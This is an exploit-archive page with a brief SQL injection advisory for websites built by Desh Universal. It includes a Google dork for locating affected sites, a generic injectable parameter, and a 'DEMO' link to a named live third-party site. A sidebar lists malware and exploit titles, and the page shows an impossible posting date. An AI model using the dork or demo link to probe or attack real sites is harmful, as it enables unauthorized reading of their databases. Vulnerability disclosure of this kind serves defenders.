Desh Universal SQL Injection

Posted on 30 November -0001

<HTML><HEAD><TITLE>Desh Universal SQL Injection</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY>Exploit Title :  Desh Universal SQL Injection
Google Dork : intext:"Design & Development by Desh Universal (Pvt.)"
Google Dork2 : Use Your Mind Pls !
Date : 17/01/2017
Exploit Author : Houssem_Rx
Vendor Homepage : http://deshuniversal.com/
Tested on : Kali Linux

## Vulnerability : ## 

1. Description
An attacker can exploit this vulnerability to read from the database.
- HTTP Method : GET
2. SQL Injection / Proof of Concept:
Vulnerable Parametre: All Parametres are Vulnerable.
http://localhost/[PATH]/messages?messageid=[SQL]
3. DEMO :
http://www.dcgpsc.edu.bd/all-staff.php?id=2' [SQL INJECTION VULNERABILITY]

# Discovered by : Houssem_Rx</BODY></HTML>

TOP

Malware :

RATDispenser
Raspberry Robin
ObliqueRAT
DoppelPaymer
Dridex

Last 20

Exploits :

Customer Support System 1.0 Cross Site Scripting
Xhibiter NFT Marketplace 1.10.2 SQL Injection
WordPress WPCode Lite 2.1.14 Cross Site Scripting
Azon Dominator Affiliate Marketing Script SQL Injection
Simple Laboratory Management System 1.0 SQL Injection

Last 20